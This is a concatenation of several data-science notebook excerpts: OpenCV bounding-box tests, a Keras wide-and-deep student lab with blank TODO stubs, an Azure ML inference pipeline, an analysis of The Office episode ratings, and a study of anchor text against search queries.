            cv2.fillPoly(cnt_fill, [cnt], color)
            # Compare the areas and keep the filled bounding box only if the
            # ratio is lower than fill_threshold
            if np.sum(obbox) / np.sum(cnt_fill) < fill_threshold:
                out = np.where(out > 0, out, obbox)
            else:
                out = np.where(out > 0, out, cnt_fill)
        else:
            out = np.where(out > 0, out, obbox)
    return out
img1 = np.zeros((16,16))
img1[4:12,4:12] = 1
img1 = np.uint8(transform.rotate(img1, 0, order=0))
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16))
img1[4:12,4:12] = 1.
img1[:4, 5] = 1.
img1 = np.uint8(transform.rotate(img1, -20, order=0) * 255)
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16))
img1[4:12,4:12] = 1.
img1[:4, 5] = 1.
img1 = np.uint8(transform.rotate(img1, -20, order=0) * 255)
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1, fill_threshold=1.5)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16))
img1[4:12,4:12] = 1.
img1[:4, 5] = 1.
img1 = np.uint8(transform.rotate(img1, -20, order=0) * 255)
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1, fill_threshold=1.2)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16), dtype=np.uint8)
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16), dtype=np.uint8)
img1[4:10, 4:10] = 1.
img1[9:14, 9:14] = 1.
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16), dtype=np.uint8)
img1[4:10, 4:10] = 1.
img1[9:14, 9:14] = 1.
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1, fill_threshold=1.2)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16), dtype=np.uint8)
img1[4:7, 4:7] = 1.
img1[9:14, 9:14] = 1.
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((768,768))
img1[100:600,150:500] = 1.
img1 = np.uint8(transform.rotate(img1, -45, order=0) * 255)
%timeit fill_oriented_bbox(img1, fill_threshold=1.2)
```
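The oriented boxes above rely on OpenCV. For comparison, a plain axis-aligned bounding box can be computed with NumPy alone; this sketch (not part of the original code) derives the box from the nonzero pixel coordinates:

```python
import numpy as np

def fill_axis_aligned_bbox(img, color=1):
    """Fill the axis-aligned bounding box of all nonzero pixels."""
    out = np.zeros_like(img)
    coords = np.argwhere(img > 0)
    if coords.size == 0:
        return out  # empty mask -> empty box
    (r0, c0), (r1, c1) = coords.min(axis=0), coords.max(axis=0)
    out[r0:r1 + 1, c0:c1 + 1] = color
    return out

img = np.zeros((8, 8), dtype=np.uint8)
img[2:4, 1:3] = 1
img[5, 6] = 1
bbox = fill_axis_aligned_bbox(img)
print(bbox.sum())  # 4 rows x 6 cols = 24 filled pixels
```

Unlike the oriented version, this box is always aligned with the image axes, so it can cover much more empty area for rotated shapes.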
# LAB 4c: Create Keras Wide and Deep model.
**Learning Objectives**
1. Set CSV Columns, label column, and column defaults
1. Make dataset of features and label from CSV files
1. Create input layers for raw features
1. Create feature columns for inputs
1. Create wide layer, deep dense hidden layers, and output layer
1. Create custom evaluation metric
1. Build wide and deep model tying all of the pieces together
1. Train and evaluate
## Introduction
In this notebook, we'll be using Keras to create a wide and deep model to predict the weight of a baby before it is born.
We'll start by defining the CSV column names, label column, and column defaults for our data inputs. Then, we'll construct a tf.data Dataset of features and the label from the CSV files and create input layers for the raw features. Next, we'll set up feature columns for the model inputs and build a wide and deep neural network in Keras. We'll create a custom evaluation metric and build our wide and deep model. Finally, we'll train and evaluate our model.
Each learning objective will correspond to a __#TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/4c_keras_wide_and_deep_babyweight.ipynb).
## Load necessary libraries
```
import datetime
import os
import shutil
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
print(tf.__version__)
```
## Verify CSV files exist
In the seventh lab of this series [4a_sample_babyweight](../solutions/4a_sample_babyweight.ipynb), we sampled from BigQuery our train, eval, and test CSV files. Verify that they exist, otherwise go back to that lab and create them.
```
%%bash
ls *.csv
%%bash
head -5 *.csv
```
## Create Keras model
### Lab Task #1: Set CSV Columns, label column, and column defaults.
Now that we have verified that our CSV files exist, we need to set a few things that we will be using in our input function.
* `CSV_COLUMNS` are going to be our header names of our columns. Make sure that they are in the same order as in the CSV files
* `LABEL_COLUMN` is the header name of the column that is our label. We will need to know this to pop it from our features dictionary.
* `DEFAULTS` is a list with the same length as `CSV_COLUMNS`, i.e. there is a default for each column in our CSVs. Each element is a list itself with the default value for that CSV column.
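To illustrate the expected shape of these constants, here is a sketch with column names guessed from the feature descriptions later in this lab (is_male, plurality, mother_age, gestation_weeks); confirm the names and order against your actual CSV header before using them:

```python
# Hypothetical header and defaults -- for illustration only
CSV_COLUMNS_EXAMPLE = [
    "weight_pounds",    # label
    "is_male",          # categorical, treated as a string
    "mother_age",       # numeric
    "plurality",        # categorical, treated as a string
    "gestation_weeks",  # numeric
]
LABEL_COLUMN_EXAMPLE = "weight_pounds"

# One single-element list per column: the default used when a field is missing
DEFAULTS_EXAMPLE = [[0.0], ["null"], [0.0], ["null"], [0.0]]

print(len(DEFAULTS_EXAMPLE) == len(CSV_COLUMNS_EXAMPLE))  # True
```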
```
# Determine CSV, label, and key columns
# TODO: Create list of string column headers, make sure order matches.
CSV_COLUMNS = [""]
# TODO: Add string name for label column
LABEL_COLUMN = ""
# Set default values for each CSV column as a list of lists.
# Treat is_male and plurality as strings.
DEFAULTS = []
```
### Lab Task #2: Make dataset of features and label from CSV files.
Next, we will write an input_fn to read the data. Since we are reading from CSV files, we can save ourselves from reinventing the wheel and use `tf.data.experimental.make_csv_dataset`. This will create a CSV dataset object. However, we will need to divide the columns up into features and a label. We can do this by applying the map method to our dataset and popping our label column off of our dictionary of feature tensors.
```
def features_and_labels(row_data):
    """Splits features and labels from feature dictionary.

    Args:
        row_data: Dictionary of CSV column names and tensor values.
    Returns:
        Dictionary of feature tensors and label tensor.
    """
    label = row_data.pop(LABEL_COLUMN)
    return row_data, label  # features, label


def load_dataset(pattern, batch_size=1, mode='eval'):
    """Loads dataset using the tf.data API from CSV files.

    Args:
        pattern: str, file pattern to glob into list of files.
        batch_size: int, the number of examples per batch.
        mode: 'eval' | 'train' to determine if training or evaluating.
    Returns:
        `Dataset` object.
    """
    # TODO: Make a CSV dataset
    dataset = tf.data.experimental.make_csv_dataset()

    # TODO: Map dataset to features and label
    dataset = dataset.map()  # features, label

    # Shuffle and repeat for training
    if mode == 'train':
        dataset = dataset.shuffle(buffer_size=1000).repeat()

    # Take advantage of multi-threading; 1=AUTOTUNE
    dataset = dataset.prefetch(buffer_size=1)
    return dataset
```
### Lab Task #3: Create input layers for raw features.
We'll need to get the data read in by our input function to our model function, but just how do we go about connecting the dots? We can use Keras input layers [(tf.Keras.layers.Input)](https://www.tensorflow.org/api_docs/python/tf/keras/Input) by defining:
* shape: A shape tuple (integers), not including the batch size. For instance, shape=(32,) indicates that the expected input will be batches of 32-dimensional vectors. Elements of this tuple can be None; 'None' elements represent dimensions where the shape is not known.
* name: An optional name string for the layer. Should be unique in a model (do not reuse the same name twice). It will be autogenerated if it isn't provided.
* dtype: The data type expected by the input, as a string (float32, float64, int32...)
```
def create_input_layers():
    """Creates dictionary of input layers for each feature.

    Returns:
        Dictionary of `tf.keras.layers.Input` layers for each feature.
    """
    # TODO: Create dictionary of tf.keras.layers.Input for each dense feature
    deep_inputs = {}

    # TODO: Create dictionary of tf.keras.layers.Input for each sparse feature
    wide_inputs = {}

    inputs = {**wide_inputs, **deep_inputs}

    return inputs
```
### Lab Task #4: Create feature columns for inputs.
Next, define the feature columns. `mother_age` and `gestation_weeks` should be numeric. The others, `is_male` and `plurality`, should be categorical. Remember, only dense feature columns can be inputs to a DNN.
```
def create_feature_columns(nembeds):
    """Creates wide and deep dictionaries of feature columns from inputs.

    Args:
        nembeds: int, number of dimensions to embed categorical column down to.
    Returns:
        Wide and deep dictionaries of feature columns.
    """
    # TODO: Create deep feature columns for numeric features
    deep_fc = {}

    # TODO: Create wide feature columns for categorical features
    wide_fc = {}

    # TODO: Bucketize the float fields. This makes them wide

    # TODO: Cross all the wide cols, have to do the crossing before we one-hot

    # TODO: Embed cross and add to deep feature columns

    return wide_fc, deep_fc
```
### Lab Task #5: Create wide and deep model and output layer.
So we've figured out how to get our inputs ready for machine learning, but now we need to connect them to our desired output. Our model architecture is what links the two together. We need to create a wide and deep model now. The wide side will just be a linear regression or dense layer. For the deep side, let's create some hidden dense layers. All of this will end with a single dense output layer. This is regression, so make sure the output layer activation is correct and that the shape is right.
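Before writing the Keras code, the shape bookkeeping of the final steps can be sketched in plain NumPy (illustrative only; the layer sizes here are arbitrary assumptions):

```python
import numpy as np

batch = 4
deep_out = np.random.rand(batch, 32)   # output of the last deep hidden layer
wide_out = np.random.rand(batch, 16)   # output of the linear wide side

# Concatenating along the feature axis is what tf.keras.layers.concatenate does
both = np.concatenate([deep_out, wide_out], axis=1)
print(both.shape)  # (4, 48)

# A single linear output unit: for regression, no squashing activation
w = np.random.rand(48, 1)
b = 0.0
output = both @ w + b
print(output.shape)  # (4, 1)
```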
```
def get_model_outputs(wide_inputs, deep_inputs, dnn_hidden_units):
    """Creates model architecture and returns outputs.

    Args:
        wide_inputs: Dense tensor used as inputs to wide side of model.
        deep_inputs: Dense tensor used as inputs to deep side of model.
        dnn_hidden_units: List of integers where length is number of hidden
            layers and ith element is the number of neurons at ith layer.
    Returns:
        Dense tensor output from the model.
    """
    # Hidden layers for the deep side
    layers = [int(x) for x in dnn_hidden_units]
    deep = deep_inputs

    # TODO: Create DNN model for the deep side
    deep_out = None

    # TODO: Create linear model for the wide side
    wide_out = None

    # Concatenate the two sides
    both = tf.keras.layers.concatenate(
        inputs=[deep_out, wide_out], name="both")

    # TODO: Create final output layer
    output = None

    return output
```
### Lab Task #6: Create custom evaluation metric.
We want to make sure that we have some useful way to measure model performance for us. Since this is regression, we would like to know the RMSE of the model on our evaluation dataset, however, this does not exist as a standard evaluation metric, so we'll have to create our own by using the true and predicted labels.
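The metric itself is just the square root of the mean squared error between true and predicted labels; in NumPy terms (a sketch of the idea, not the TensorFlow implementation the TODO asks for):

```python
import numpy as np

def rmse_np(y_true, y_pred):
    """Root mean squared error between two arrays."""
    return np.sqrt(np.mean(np.square(y_pred - y_true)))

print(rmse_np(np.array([7.0, 8.0]), np.array([6.0, 9.0])))  # 1.0
```

The TensorFlow version replaces the NumPy ops with their `tf` counterparts so the metric runs on tensors inside the training loop.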
```
def rmse(y_true, y_pred):
    """Calculates RMSE evaluation metric.

    Args:
        y_true: tensor, true labels.
        y_pred: tensor, predicted labels.
    Returns:
        Tensor with value of RMSE between true and predicted labels.
    """
    # TODO: Calculate RMSE from true and predicted labels
    pass
```
### Lab Task #7: Build wide and deep model tying all of the pieces together.
Excellent! We've assembled all of the pieces, now we just need to tie them all together into a Keras Model. This is NOT a simple feedforward model with no branching, side inputs, etc. so we can't use Keras' Sequential Model API. We're instead going to use Keras' Functional Model API. Here we will build the model using [tf.keras.models.Model](https://www.tensorflow.org/api_docs/python/tf/keras/Model) giving our inputs and outputs and then compile our model with an optimizer, a loss function, and evaluation metrics.
```
def build_wide_deep_model(dnn_hidden_units=[64, 32], nembeds=3):
    """Builds wide and deep model using Keras Functional API.

    Returns:
        `tf.keras.models.Model` object.
    """
    # Create input layers
    inputs = create_input_layers()

    # Create feature columns
    wide_fc, deep_fc = create_feature_columns(nembeds)

    # The constructor for DenseFeatures takes a list of dense columns
    # The Functional API in Keras requires: LayerConstructor()(inputs)
    # TODO: Add wide and deep feature columns
    wide_inputs = tf.keras.layers.DenseFeatures(
        feature_columns=[],  # TODO
        name="wide_inputs")(inputs)
    deep_inputs = tf.keras.layers.DenseFeatures(
        feature_columns=[],  # TODO
        name="deep_inputs")(inputs)

    # Get output of model given inputs
    output = get_model_outputs(wide_inputs, deep_inputs, dnn_hidden_units)

    # Build model and compile it all together
    model = tf.keras.models.Model(inputs=inputs, outputs=output)

    # TODO: Add custom eval metrics to list
    model.compile(optimizer="adam", loss="mse", metrics=["mse"])

    return model


print("Here is our wide and deep architecture so far:\n")
model = build_wide_deep_model()
print(model.summary())
```
We can visualize the wide and deep network using the Keras plot_model utility.
```
tf.keras.utils.plot_model(
    model=model, to_file="wd_model.png", show_shapes=False, rankdir="LR")
```
## Run and evaluate model
### Lab Task #8: Train and evaluate.
We've built our Keras model using our inputs from our CSV files and the architecture we designed. Let's now run our model by training our model parameters and periodically running an evaluation to track how well we are doing on outside data as training goes on. We'll need to load both our train and eval datasets and send those to our model through the fit method. Make sure you have the right pattern, batch size, and mode when loading the data. Also, don't forget to add the callback to TensorBoard.
```
TRAIN_BATCH_SIZE = 32
NUM_TRAIN_EXAMPLES = 10000 * 5 # training dataset repeats, it'll wrap around
NUM_EVALS = 5 # how many times to evaluate
# Enough to get a reasonable sample, but not so much that it slows down
NUM_EVAL_EXAMPLES = 10000
# TODO: Load training dataset
trainds = load_dataset()
# TODO: Load evaluation dataset
evalds = load_dataset().take(count=NUM_EVAL_EXAMPLES // 1000)
steps_per_epoch = NUM_TRAIN_EXAMPLES // (TRAIN_BATCH_SIZE * NUM_EVALS)
logdir = os.path.join(
    "logs", datetime.datetime.now().strftime("%Y%m%d-%H%M%S"))
tensorboard_callback = tf.keras.callbacks.TensorBoard(
    log_dir=logdir, histogram_freq=1)
# TODO: Fit model on training dataset and evaluate every so often
history = model.fit()
```
### Visualize loss curve
```
# Plot
nrows = 1
ncols = 2
fig = plt.figure(figsize=(10, 5))
for idx, key in enumerate(["loss", "rmse"]):
    ax = fig.add_subplot(nrows, ncols, idx + 1)
    plt.plot(history.history[key])
    plt.plot(history.history["val_{}".format(key)])
    plt.title("model {}".format(key))
    plt.ylabel(key)
    plt.xlabel("epoch")
    plt.legend(["train", "validation"], loc="upper left");
```
### Save the model
```
OUTPUT_DIR = "babyweight_trained_wd"
shutil.rmtree(OUTPUT_DIR, ignore_errors=True)
EXPORT_PATH = os.path.join(
OUTPUT_DIR, datetime.datetime.now().strftime("%Y%m%d%H%M%S"))
tf.saved_model.save(
obj=model, export_dir=EXPORT_PATH) # with default serving function
print("Exported trained model to {}".format(EXPORT_PATH))
!ls $EXPORT_PATH
```
## Lab Summary:
In this lab, we started by defining the CSV column names, label column, and column defaults for our data inputs. Then, we constructed a tf.data Dataset of features and the label from the CSV files and created input layers for the raw features. Next, we set up feature columns for the model inputs and built a wide and deep neural network in Keras. We created a custom evaluation metric and built our wide and deep model. Finally, we trained and evaluated our model.
Copyright 2019 Google Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License
# Pipeline for AutoML Inference
Azure Machine Learning Pipelines let you build reusable pipelines. In this notebook, we create an inference pipeline for a model built with AutoML.
# 1. Prerequisites
## 1.1 Import the Python SDK
Import the Azure Machine Learning Python SDK and related packages.
```
import pandas as pd
import azureml.core
from azureml.core import Workspace, Experiment, Dataset, Model
from azureml.core import Environment
```
Confirm that the Azure ML Python SDK version is 1.8.0 or later.
```
print("You are currently using version", azureml.core.VERSION, "of the Azure ML SDK")
```
## 1.2 Connect to the Azure ML Workspace
```
ws = Workspace.from_config()
experiment_name = 'livedoor-news-classification-BERT-pipeline-inference'
experiment = Experiment(ws, experiment_name)
output = {}
#output['Subscription ID'] = ws.subscription_id
output['Workspace Name'] = ws.name
output['Resource Group'] = ws.resource_group
output['Location'] = ws.location
output['Experiment Name'] = experiment.name
pd.set_option('display.max_colwidth', -1)
outputDf = pd.DataFrame(data = output, index = [''])
outputDf.T
```
## 1.3 Prepare the compute environment
Prepare a GPU `Compute Cluster` to run BERT.
```
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
# Name of the Compute Cluster
amlcompute_cluster_name = "gpucluster"

# Check whether a cluster with this name already exists
try:
    compute_target = ComputeTarget(workspace=ws, name=amlcompute_cluster_name)
except ComputeTargetException:
    print('No cluster with the specified name was found, so a new one will be created.')
    compute_config = AmlCompute.provisioning_configuration(vm_size="STANDARD_NC6_V3",
                                                           max_nodes=4)
    compute_target = ComputeTarget.create(ws, amlcompute_cluster_name, compute_config)

compute_target.wait_for_completion(show_output=True)
```
## 1.4 Prepare the inference data
Here we use the **livedoor news corpus** as the inference data. Adjust as needed.
```
inference_dataset = Dataset.get_by_name(ws, "livedoor").keep_columns(["text"])
inference_dataset.take(5).to_pandas_dataframe()
```
## 1.5 Prepare the Environment
Prepare the Azure Machine Learning Environment. Here we use a curated environment; adjust as needed.
```
envs = Environment.list(workspace=ws)
# # Print the list of curated Environments
# [env if env.startswith("AzureML") else None for env in envs]
env = Environment.get(workspace=ws, name='AzureML-AutoML-DNN-GPU')
# Specify this Environment for use at inference time.
from azureml.core.runconfig import RunConfiguration
run_config = RunConfiguration()
run_config.environment.docker.enabled = True
run_config.environment = env
```
# 2. Machine Learning Pipeline
## 2.1 Create the pipeline
```
from azureml.pipeline.steps import PythonScriptStep
ds_input = inference_dataset.as_named_input('input1')
project_folder = '../code/deployment'
# Step that runs the inference script
inferenceStep = PythonScriptStep(
script_name="inference_script.py",
inputs=[ds_input],
compute_target=compute_target,
source_directory=project_folder,
runconfig=run_config,
allow_reuse=True
)
from azureml.pipeline.core import Pipeline
# A pipeline consisting of only the step above
pipeline = Pipeline(
description="pipeline_with_automlstep",
workspace=ws,
steps=[inferenceStep])
```
## 2.2 Validate the pipeline
```
pipeline.validate()
print("Pipeline validation complete")
```
## 2.3 Run the pipeline
```
pipeline_run = experiment.submit(pipeline)
from azureml.widgets import RunDetails
RunDetails(pipeline_run).show()
```
## 1. Welcome!
<p><img src="https://assets.datacamp.com/production/project_1170/img/office_cast.jpeg" alt="Markdown">.</p>
<p><strong>The Office!</strong> What started as a British mockumentary series about office culture in 2001 has since spawned ten other variants across the world, including an Israeli version (2010-13), a Hindi version (2019-), and even a French Canadian variant (2006-2007). Of all these iterations (including the original), the American series has been the longest-running, spanning 201 episodes over nine seasons.</p>
<p>In this notebook, we will take a look at a dataset of The Office episodes, and try to understand how the popularity and quality of the series varied over time. To do so, we will use the following dataset: <code>datasets/office_episodes.csv</code>, which was downloaded from Kaggle <a href="https://www.kaggle.com/nehaprabhavalkar/the-office-dataset">here</a>.</p>
<p>This dataset contains information on a variety of characteristics of each episode. In detail, these are:
<br></p>
<div style="background-color: #efebe4; color: #05192d; text-align:left; vertical-align: middle; padding: 15px 25px 15px 25px; line-height: 1.6;">
<div style="font-size:20px"><b>datasets/office_episodes.csv</b></div>
<ul>
<li><b>episode_number:</b> Canonical episode number.</li>
<li><b>season:</b> Season in which the episode appeared.</li>
<li><b>episode_title:</b> Title of the episode.</li>
<li><b>description:</b> Description of the episode.</li>
<li><b>ratings:</b> Average IMDB rating.</li>
<li><b>votes:</b> Number of votes.</li>
<li><b>viewership_mil:</b> Number of US viewers in millions.</li>
<li><b>duration:</b> Duration in number of minutes.</li>
<li><b>release_date:</b> Airdate.</li>
<li><b>guest_stars:</b> Guest stars in the episode (if any).</li>
<li><b>director:</b> Director of the episode.</li>
<li><b>writers:</b> Writers of the episode.</li>
<li><b>has_guests:</b> True/False column for whether the episode contained guest stars.</li>
<li><b>scaled_ratings:</b> The ratings scaled from 0 (worst-reviewed) to 1 (best-reviewed).</li>
</ul>
</div>
```
# import necessary libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# read the csv file
df = pd.read_csv('datasets/office_episodes.csv')
print(df.shape)
df.head(3)
```
# First Step:
```
# We need to create a scatter plot: episode number on the x-axis,
# viewership (in millions) on the y-axis
x_axis = df['episode_number']
y_axis = df['viewership_mil']

# A color scheme reflecting the scaled ratings
def color_change(score):
    if score < 0.25:
        return 'red'
    elif 0.25 <= score < 0.5:
        return 'orange'
    elif 0.5 <= score < 0.75:
        return 'lightgreen'
    else:
        return 'darkgreen'

color_scheme = df['scaled_ratings'].apply(color_change)

# Size system: episodes with guest appearances get size 250, otherwise 25
def mark_size(guest):
    if guest is True:
        return 250
    return 25

size_system = df['has_guests'].apply(mark_size)

# Make the plot bigger (set before creating the figure so it takes effect)
plt.rcParams['figure.figsize'] = [11, 7]

# Initialize the matplotlib.pyplot figure
fig = plt.figure()

# Create the scatter plot
plt.scatter(x_axis, y_axis, c=color_scheme, s=size_system, marker='*')

# Plot with title 'Popularity, Quality, and Guest Appearances on the Office'
plt.title('Popularity, Quality, and Guest Appearances on the Office')

# Plot with xlabel "Episode Number"
plt.xlabel("Episode Number")

# Plot with ylabel "Viewership (Millions)"
plt.ylabel('Viewership (Millions)')
```
# Second Step:
```
# Select the rows where has_guests is True
df = df[df['has_guests'] == True]

# Group by guest_stars and aggregate the total viewership per guest
df = df.groupby(df['guest_stars']).sum()

# Select the viewership_mil column
guest_viewership = df['viewership_mil']

# Find the maximum viewership
max_view = max(np.array(guest_viewership))

# Select the guest star(s) whose total viewership equals the maximum
popular_guest = guest_viewership[guest_viewership == max_view]
top_star = popular_guest.index[0].split(',')[0]
top_star
```
# Mining of Parallel query/Anchor Text: Similarity
```
DATA_FILE='/mnt/ceph/storage/data-in-progress/data-research/web-search/ECIR-22/ecir21-anchor2query/tmp'
from tqdm import tqdm
import pandas as pd
import json
unpopular = 0
unpopular_and_non_identical = 0
df = []
with open(DATA_FILE) as f:
    for l in tqdm(f):
        l = json.loads(l)
        if l['orcasQueries'] <= 10:
            unpopular += 1
            if not l['identical_domain']:
                unpopular_and_non_identical += 1
        df += [l]
df = pd.DataFrame(df)
print(unpopular)
print(unpopular_and_non_identical)
```
# Properties of the Sample
- 1.6 million links
- 5% of CC 2019-47 URLs
- Source and target have different domains
- Only non-popular documents (<= 10 queries pointing to the document)
```
df.head(4)
import seaborn as sns
sns.histplot(df['anchorTextScoreCoveredTerms'])
```
It looks like there are exactly two types of anchor text:
- Similarity 1.0: Anchor texts very similar to queries (all words in the anchor text appear also in frequent queries)
- Similarity 0.0: Anchor texts disjoint to queries (all words in the anchor text do not appear in frequent queries)
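The two modes can be reproduced with a stripped-down version of the similarity computation used below (whitespace tokenization instead of NLTK stemming and stop-word removal; for illustration only):

```python
def covered_terms_similarity(queries, anchor_text):
    """Fraction of anchor-text terms that also appear in any frequent query."""
    query_terms = set(w for q in queries for w in q.lower().split())
    anchor_terms = set(anchor_text.lower().split())
    if not anchor_terms:
        return 0.0
    return sum(1 for t in anchor_terms if t in query_terms) / len(anchor_terms)

queries = ["cheap flights", "flight booking"]
print(covered_terms_similarity(queries, "cheap flights"))  # 1.0 -> "match"
print(covered_terms_similarity(queries, "click here"))     # 0.0 -> "mismatch"
```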
# Manual Review of Anchors
```
# Helper Code
def normalize(text):
    import nltk
    nltk.data.path = ['/mnt/ceph/storage/data-in-progress/data-research/web-archive/EMNLP-21/emnlp-web-archive-questions/cluster-libs/nltk_data']
    from nltk.stem import PorterStemmer
    from nltk.tokenize import word_tokenize
    from nltk.corpus import stopwords
    stop_words = set(stopwords.words('english'))
    ps = PorterStemmer()
    return [ps.stem(i) for i in word_tokenize(text) if i not in stop_words]

def weighted_representation(texts):
    from collections import defaultdict
    absolute_count = defaultdict(lambda: 0)
    for text in texts:
        for word in normalize(text):
            absolute_count[word] += 1
    return {k: v / len(texts) for k, v in absolute_count.items()}

def similarity(weights, text):
    text = set(normalize(text))
    ret = 0
    if text is None or len(text) == 0:
        return (0, 0.0)
    for k, v in weights.items():
        if k in text:
            ret += v
    covered_terms = 0
    for k in text:
        if k in weights:
            covered_terms += 1
    return (ret, covered_terms / len(text))

def __add_to_path(p):
    import sys
    if p not in sys.path:
        sys.path.append(p)

def domain(url):
    __add_to_path('/mnt/ceph/storage/data-in-progress/data-research/web-archive/EMNLP-21/emnlp-web-archive-questions/cluster-libs/tld')
    from tld import get_tld
    ret = get_tld(url, as_object=True, fail_silently=True)
    if ret:
        return ret.domain
    else:
        return 'None'

def identical_domain(i):
    return domain(i['document']['srcUrl']).lower() == domain(i['targetUrl']).lower()

def enrich_similarity(i):
    i = dict(i)
    weights = weighted_representation(i['orcasQueries'])
    contextSim = similarity(weights, i['anchorContext'])
    anchorSim = similarity(weights, i['anchorText'])
    i['anchorContextScore'] = contextSim[0]
    i['anchorContextCoveredTerms'] = contextSim[1]
    i['anchorTextScore'] = anchorSim[0]
    i['anchorTextScoreCoveredTerms'] = anchorSim[1]
    return i

def enrich_domain(i):
    i = dict(i)
    i['identical_domain'] = identical_domain(i)
    return i

def pretty_print_text(entry):
    import re
    from termcolor import colored
    weights = weighted_representation(entry['orcasQueries'])
    # str.replace does not interpret regular expressions, so use re.sub
    # to collapse whitespace runs into single spaces
    tmp = re.sub(r'\s+', ' ', entry['anchorContext'])
    ret = ''
    for w in tmp.split(' '):
        crnt = w
        normalized_w = normalize(w)
        tmp_str = []
        for nw in normalized_w:
            if nw in weights:
                tmp_str += [nw + ':' + str(weights[nw])]
        if len(tmp_str) > 0:
            crnt += '[' + (';'.join(tmp_str)) + ']'
            crnt = colored(crnt, 'red')
        ret += ' ' + crnt
    return ret.strip()

def pretty_print(entry):
    print('Document: ' + str(entry['document']['srcUrl']))
    print('OrcasQueries: ' + str(entry['orcasQueries']))
    print('Target\n\tUrl: ' + entry['targetUrl'])
    print('\tAnchor:\n\t\t\'' + entry['anchorText'] + '\'\n')
    print('\tAnchorContext: \'' + pretty_print_text(entry) + '\'')

def report(df, start, end):
    for _, i in df.iloc[start:end].iterrows():
        pretty_print(i)
        print('\n\n\n')
```
## Manual Review of some Mismatch Anchors
```
import pandas as pd
df_mismatch = pd.read_json('/mnt/ceph/storage/data-in-progress/data-research/web-search/ECIR-22/ecir21-anchor2query/mismatch_anchors_sample.jsonl', lines=True)
report(df_mismatch, 0, 10)
```
## Manual Verification of some Match Anchors
```
import pandas as pd
df_match = pd.read_json('/mnt/ceph/storage/data-in-progress/data-research/web-search/ECIR-22/ecir21-anchor2query/match_anchors_sample.jsonl', lines=True)
report(df_match, 0, 10)
report(df_match, 11, 20)
def all_terms_in_url(url, terms):
    for term in terms:
        if term.lower() not in url.lower():
            return False
    return True

def normalize_without_stemming(text):
    import nltk
    nltk.data.path = ['/mnt/ceph/storage/data-in-progress/data-research/web-archive/EMNLP-21/emnlp-web-archive-questions/cluster-libs/nltk_data']
    from nltk.corpus import stopwords
    from nltk.tokenize import word_tokenize
    stop_words = set(stopwords.words('english'))
    return [i for i in word_tokenize(text) if i not in stop_words]

def normalize_without_stemming_and_stopwords(text):
    import nltk
    nltk.data.path = ['/mnt/ceph/storage/data-in-progress/data-research/web-archive/EMNLP-21/emnlp-web-archive-questions/cluster-libs/nltk_data']
    from nltk.tokenize import word_tokenize
    return [i for i in word_tokenize(text)]

def exact_url_match(url, text):
    try:
        return all_terms_in_url(url, normalize(text)) \
            or all_terms_in_url(url, normalize_without_stemming(text)) \
            or all_terms_in_url(url, normalize_without_stemming_and_stopwords(text))
    except:
        return False

assert exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'by-nc-sa')
assert exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'creative commons license')
assert exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'creative commons')
assert not exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'atlasama.free.fr')
assert not exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'cc-by-nc-sa')
assert not exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'cc by-nc-sa')
assert not exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'creative commons cc by')

def orcas_queries_without_exact_matches(i):
    url = i['targetUrl']
    ret = list(i['orcasQueries'])
    return [j for j in ret if not exact_url_match(url, j)]
exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'atlasama.free.fr')
df_match['orcasQueriesWithoutExactMatch'] = df_match.apply(orcas_queries_without_exact_matches, axis=1)
df_match['exactMatchQueries'] = df_match.apply(lambda i: len(i['orcasQueries']) - len(i['orcasQueriesWithoutExactMatch']), axis=1)
import seaborn as sns
sns.distplot(df_match['exactMatchQueries'])
sns.distplot(df_match['orcasQueriesWithoutExactMatch'].apply(lambda i: len(i)))
sum(df_match['orcasQueriesWithoutExactMatch'].apply(lambda i: len(i)))
sum(df_match['orcasQueries'].apply(lambda i: len(i)))
(53041-33646)/53041
```
# Exact containment orcas queries
```
!cat /mnt/ceph/storage/data-in-progress/data-teaching/theses/wstud-thesis-probst/ms-marco-docs/msmarco-docs.tsv|wc -l
from tqdm import tqdm
doc_to_url = {}
with open('/mnt/ceph/storage/data-in-progress/data-teaching/theses/wstud-thesis-probst/ms-marco-docs/msmarco-docs.tsv') as f:
for l in tqdm(f):
l = l.split('\t')
doc_to_url[l[0]] = l[1]
len(doc_to_url)
import pandas as pd
df_orcas = pd.read_csv('/mnt/ceph/storage/data-in-progress/data-teaching/theses/wstud-thesis-probst/ms-marco-docs/orcas.tsv.gz', sep='\t', names=['Q_ID', 'Query', 'D_ID', 'D_URL'])
df_orcas
